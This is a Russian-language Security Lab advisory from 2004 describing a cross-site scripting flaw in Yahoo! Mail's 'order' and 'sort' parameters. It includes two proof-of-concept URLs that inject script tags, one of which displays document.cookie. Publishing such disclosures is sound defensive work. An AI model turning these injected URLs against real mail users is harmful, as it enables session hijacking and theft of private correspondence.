Security Lab

Межайтовый скриптинг в Yahoo! Mail

Дата публикации:11.03.2004
Всего просмотров:1085
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Yahoo! Mail

Описание: Уязвимость обнаружена в Yahoo! Mail. Удаленный пользователь может выполнить XSS нападение.

Yahoo! Mail не проверяет правильность данных, представленных пользователем в полях 'order' и 'sort'.

Пример/Эксплоит:

http://[target]/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_
0_917_ -1_0&YY=96862&inc=25&order=down"><script>alert('This can be your
cookie')</script>&sort=date&pos=0&view=a&head=b&box=Inbox

http://[target]/ym/ShowLetter?MsgId=3308_15 1647_1069_1720_553_
0_917_-1_0&YY=92552&inc=25&order=down&sort=date"><script>alert(document.cookie)
</script>&pos=0&view=a&head=b&box=Inbox

URL производителя: http://www.yahoo.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Yahoo WebMail! Cross Site Scripting Vulnerability